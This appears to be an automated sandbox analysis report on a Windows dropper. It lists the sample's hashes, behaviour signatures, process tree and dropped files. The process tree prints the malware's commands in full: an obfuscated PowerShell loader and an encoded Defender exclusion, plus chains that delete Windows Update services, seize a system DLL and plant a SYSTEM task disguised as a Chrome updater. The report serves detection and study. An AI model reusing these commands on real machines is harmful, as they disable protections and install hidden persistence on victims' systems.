Analysis
-
max time kernel
151s -
max time network
62s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
15-11-2022 10:22
General
-
Target
6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe
-
Size
2.7MB
-
MD5
cff0e1b4af4ef5a2d4cb78ea5d403d58
-
SHA1
5224506ce265475452aeddf540f5f9b996f84bd6
-
SHA256
6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915
-
SHA512
55cfed7b7a95c71afd8191116f03829b8c51661cf1de035652e08b8ae4b8003f569ca6e198748167e626d17edb7012fe535aa08e8af2e09d2440880088fa2c40
-
SSDEEP
49152:YX9bvpxA+I4AY+a7xIrLlxJq5ZjoVrY4u0uXh/DP+P:2DnNExInjojwRK
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\taskeng.exetaskeng.exe {0E5DA892-BA2E-4DF2-BAA8-53FB791F3A01} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdwBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbgAjAD4A"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "lyjkyhzqxcegy"5⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{66047500-c3c8-4b75-8584-bc852a2a3086}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{edeb09e1-29e0-4a09-a709-861890536684}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe"C:\Users\Admin\AppData\Local\Temp\6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdwBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbgAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe"3⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1947483103730836851384763572777073902811826447-54077473-1719405770-2005645080"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1300148536-1252323439132868966169189001-79649579-127629863-1976244638-1372352485"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1852278413-19292306911887822764-852599615-144409889-272029777339773161462798328"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "180893506518513205834629656551093141176383579487-1122700631-1155208853-1635767525"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.7MB
MD5cff0e1b4af4ef5a2d4cb78ea5d403d58
SHA15224506ce265475452aeddf540f5f9b996f84bd6
SHA2566819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915
SHA51255cfed7b7a95c71afd8191116f03829b8c51661cf1de035652e08b8ae4b8003f569ca6e198748167e626d17edb7012fe535aa08e8af2e09d2440880088fa2c40
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.7MB
MD5cff0e1b4af4ef5a2d4cb78ea5d403d58
SHA15224506ce265475452aeddf540f5f9b996f84bd6
SHA2566819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915
SHA51255cfed7b7a95c71afd8191116f03829b8c51661cf1de035652e08b8ae4b8003f569ca6e198748167e626d17edb7012fe535aa08e8af2e09d2440880088fa2c40
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD572a5566d9e09e640d23fb82350b128df
SHA12aaf8d5aaba3eb5a9c6f403f456dd73bc74610d5
SHA256c3632cf16f39f9e97a748383f4ba4854dbe48c23f2217e54572e8f91e34b0f36
SHA51291dc1ecfb4d685c8cefa2c7a94339fbb9f44adc7ce9fdf7513457bce2b0ca4595d3d1ee79d6530f730323b72843dc82249d967978c228bade90b35b79cb89ba6
-
C:\Windows\system32\drivers\etc\hostsFilesize
936B
MD5488f37f7e0cc4a3c3ac16e8dfa1fea2b
SHA1c191425f03a197a38e0656fdceba93c116b002ab
SHA2560fbd138c7d5d462b515eaf5fa28378302664b12dc7c1aa17768e16268a935bb8
SHA512a52f5fd73afc68a9108a3558eecc11feecb4dac9ee0bbbbcfff397b835493e731fa48f7675a5cb5e8502c034af1d6d21e1d44508e61725d065a8469330818a78
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exeFilesize
2.7MB
MD5cff0e1b4af4ef5a2d4cb78ea5d403d58
SHA15224506ce265475452aeddf540f5f9b996f84bd6
SHA2566819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915
SHA51255cfed7b7a95c71afd8191116f03829b8c51661cf1de035652e08b8ae4b8003f569ca6e198748167e626d17edb7012fe535aa08e8af2e09d2440880088fa2c40
-
memory/308-222-0x0000000001BA0000-0x0000000001BCA000-memory.dmpFilesize
168KB
-
memory/308-227-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/328-216-0x0000000000980000-0x00000000009AA000-memory.dmpFilesize
168KB
-
memory/328-218-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/420-146-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/420-142-0x00000000002B0000-0x00000000002D3000-memory.dmpFilesize
140KB
-
memory/420-154-0x00000000002B0000-0x00000000002D3000-memory.dmpFilesize
140KB
-
memory/420-159-0x00000000002E0000-0x000000000030A000-memory.dmpFilesize
168KB
-
memory/420-148-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/456-270-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/456-272-0x0000000000200000-0x000000000022A000-memory.dmpFilesize
168KB
-
memory/456-258-0x0000000000200000-0x000000000022A000-memory.dmpFilesize
168KB
-
memory/468-152-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/468-150-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/468-165-0x0000000000150000-0x000000000017A000-memory.dmpFilesize
168KB
-
memory/476-170-0x0000000000130000-0x000000000015A000-memory.dmpFilesize
168KB
-
memory/476-157-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/476-156-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/484-164-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/484-176-0x0000000000340000-0x000000000036A000-memory.dmpFilesize
168KB
-
memory/484-163-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/524-290-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/524-299-0x00000000001A0000-0x00000000001BB000-memory.dmpFilesize
108KB
-
memory/524-300-0x00000000005D0000-0x00000000005F1000-memory.dmpFilesize
132KB
-
memory/524-298-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/524-114-0x0000000000000000-mapping.dmp
-
memory/524-264-0x00000000004039E0-mapping.dmp
-
memory/532-90-0x0000000000000000-mapping.dmp
-
memory/552-72-0x0000000000000000-mapping.dmp
-
memory/592-171-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/592-167-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/592-182-0x00000000004A0000-0x00000000004CA000-memory.dmpFilesize
168KB
-
memory/672-462-0x0000000000000000-mapping.dmp
-
memory/676-179-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/676-186-0x0000000000120000-0x000000000014A000-memory.dmpFilesize
168KB
-
memory/676-174-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/684-86-0x0000000000000000-mapping.dmp
-
memory/740-190-0x00000000009B0000-0x00000000009DA000-memory.dmpFilesize
168KB
-
memory/740-183-0x0000000037B30000-0x0000000037B40000-memory.dmpFilesize
64KB
-
memory/740-177-0x000007FEBF8D0000-0x000007FEBF8E0000-memory.dmpFilesize
64KB
-
memory/752-77-0x0000000000000000-mapping.dmp
-
memory/776-118-0x0000000000000000-mapping.dmp
-
memory/800-253-0x0000000000120000-0x000000000014A000-memory.dmpFilesize
168KB
-
memory/804-196-0x0000000000860000-0x000000000088A000-memory.dmpFilesize
168KB
-
